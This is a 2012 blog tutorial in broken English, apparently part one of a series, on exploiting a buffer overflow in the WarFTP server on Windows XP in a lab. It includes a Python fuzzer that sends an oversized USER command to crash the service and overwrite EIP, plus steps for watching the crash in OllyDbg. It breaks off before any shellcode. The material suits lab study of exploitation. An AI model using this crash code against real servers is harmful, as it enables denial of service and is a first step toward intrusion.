
Minggu, 05 Februari 2012

Direct Return Exploit(1) FTP Server on Windows sp xp3

oke now we will try to exploit FTP server on winodws sp xp2. before we try prepare requirements for exploitation.
1. Dowload WarFTP
2. Download ollyDbg
3. Fuzzer
if already prepared all the needs now install WarFTP an ollyDbg on your windows.
first steep
Open your FTP Server and press
propertis - start service

now we try to connect using nc from our backtrack
open your terminal and type : nc 21 this is ip on windows, 21 this is default  FTP Server port.
if any respot from FTP Server and we were told to enter a username it's meas connected. like the picture below
oke this time for making FTP Server crash.
now we make fuzzer for making crash by using python program.

import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x41" * 1000
s.connect ((' ',21))
data = s.recv (1024)
print("Sendingevildatavia USER command...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send(' PASS PASSWORD '+'\r\n')
print (" Finish ")

save it's by using and put it on home
it's time for making crash
type on your backtrack python and press enter
FTP Server it's be lose when you press enter becaus it's buffer over flow his EIP.
now our FTP Server lose and i try to press more but it's an error

than now we must remove a file FtpDaemon.DAT so now we run FTP Server one more for making user nama and password on User Security Properties.
now press add and give user name and passord on User Security  Properties. i make a new user by name free

oke and it's will make a new user.
applay - oke

we don't now how crash, and than we try to see process of your ollyDbg.
press file - open and choose FTP Server.
press open and FTP Server will open.
so perss F9 on your kayboard for running FTP Server and  now press start.
propertis - start service

now back to backtrack for running our fuzzer for see precess of crash on FTR Service. tye again make run fuzzing
root@bt:~# python
Sendingevildatavia USER command...Finish

oke now we can see result of process crash like a picture below.

to be continue

@keep smile & spirit
be fun

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